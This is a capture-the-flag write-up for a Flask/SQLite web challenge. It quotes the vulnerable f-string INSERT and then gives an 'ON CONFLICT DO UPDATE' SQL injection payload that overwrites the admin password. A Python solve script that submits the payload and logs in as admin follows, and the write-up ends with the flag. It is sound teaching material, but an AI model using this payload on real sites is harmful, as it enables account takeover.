CTF writeups
NoteThe website initially presented a basic login and registration form.


While testing the application with various inputs, I discovered a potential vuln. Entering a simple payload like hello' caused the /register route to respond with a 500 Internal Server Error.

Possible SQLI vulnerability hmm, suggesting that unsanitized user inputs could be directly inserted into the SQL query.

Code Review

Upon reviewing the source code, I confirmed the SQL injection vulnerability in the /register route:


Vuln-Code Snippet

cursor.execute(f"INSERT INTO users (username, password) VALUES ('{username}', '{generate_password_hash(password)}')")

In this snippet, user inputs (username and password) are directly embedded in the SQL query string, without parameterization or input sanitization, allowing for malicious SQL command injection.

Flag Location

Upon further inspection, I found that the flag is accessible only through the admin account. The /dashboard route contains the logic for displaying the flag:

def dashboard():
    if 'username' not in session:
        return redirect('/login')

    username = session['username']
    cursor = get_db().cursor()

    if username == 'admin':
        cursor.execute("SELECT flag FROM flags")
        flag = cursor.fetchone()['flag']
        return render_template('dashboard.html', username=username, flag=flag)

    return render_template('dashboard.html', username=username, flag=None)

How the Flag Is Displayed

  • Admin Privilege Requirement: If the logged-in user is admin, the application queries the flags table to retrieve the flag.

    cursor.execute("SELECT flag FROM flags")
    flag = cursor.fetchone()['flag']
  • Conditional Display: The flag is conditionally rendered in the HTML template: image

To access the flag, we need to log in as the admin user. Since we don’t know the admin password, we can utilize SQL injection to manipulate authentication and access the dashboard as the admin.


Through research, I discovered a method in SQLite3 using ON CONFLICT DO UPDATE. This allows us to update the admin password directly during registration if the username already exists.

SQLite3 Upsert

We can use the following payload as the username during registration:

admin', 'meow') ON CONFLICT(username) DO UPDATE SET password = 'achuxer';--

How It Works:

  1. The first part (admin', 'meow')) closes the INSERT statement.
  2. ON CONFLICT(username) triggers when trying to insert an existing user.
  3. The password is updated to achuxer.
  4. ;-- comments out the rest of the SQL query that follow

Solution Script: solve.py

Note: The Password is hashed using the werkzeug.security.generate_password_hash function. We can use the following script to register the admin user with the new password:

#!/usr/bin/env python3
import requests
from werkzeug.security import generate_password_hash

url = 'https://usc-spookyql.chals.io/1ef2ec1d-b8ba-44ec-8f5d-7d07ebcd598e'

def register_user(payload):
    response = requests.post(url + '/register', data={'username': payload, 'password': 'password'})
    return response

def login_user(username, password):
    response = requests.post(url + '/login', data={'username': username, 'password': password})
    return response

payload = f"""admin', 'meow') ON CONFLICT(username) DO UPDATE SET password = '{generate_password_hash('achuxer')}'; --"""

response = register_user(payload)
print("[*] Response code: ", response.status_code)

print("[*] Logging in as admin")
response = login_user('admin', 'achuxer')

After executing this, we can Get the Flag.

FLAG: CYBORG{Wh4t_h4pp3n3d_t0_my_p4ssw0rd!}